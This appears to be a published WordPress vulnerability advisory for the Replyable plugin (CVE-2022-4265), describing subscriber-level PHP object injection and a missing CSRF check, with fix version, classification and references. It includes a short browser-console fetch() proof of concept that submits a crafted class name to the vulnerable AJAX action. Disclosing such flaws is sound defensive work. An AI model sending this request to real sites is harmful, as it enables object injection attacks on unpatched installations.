WordPress Plugin Vulnerabilities

Replyable < 2.2.10 - Subscriber+ PHP Object Injection

Description

The plugin does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch('http://wpscan.local/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=prompt_dismiss_notice&class=Malicious'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Plugin icon
postmatic
Fixed in 2.2.10

References

CVE
CVE-2022-4265

Classification

Type
OBJECT INJECTION
OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502
CVSS
4.2 (medium)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
095cba08-7edd-41fb-9776-da151c0885dd

Timeline

Publicly Published
2023-02-08 (about 1 years ago)
Added
2023-02-08 (about 1 years ago)
Last Updated
2023-02-08 (about 1 years ago)

Other

Published
Title
Published
2017-03-01
Title
Analytics Stats Counter Statistics - Unauthenticated PHP Object Injection
Published
2024-04-05
Title
Product Designer < 1.0.33 - Unauthenticated PHP Object Injection
Published
2023-10-17
Title
Themify Ultra < 7.3.6 - Authenticated (Subscriber+) PHP Object Injection
Published
2023-10-24
Title
KD Coming Soon <= 1.7 - Unauthenticated PHP Object Injection via cetitle
Published
2023-09-05
Title
RSVPMaker < 10.6.7 - Unauthenticated PHP Object Injection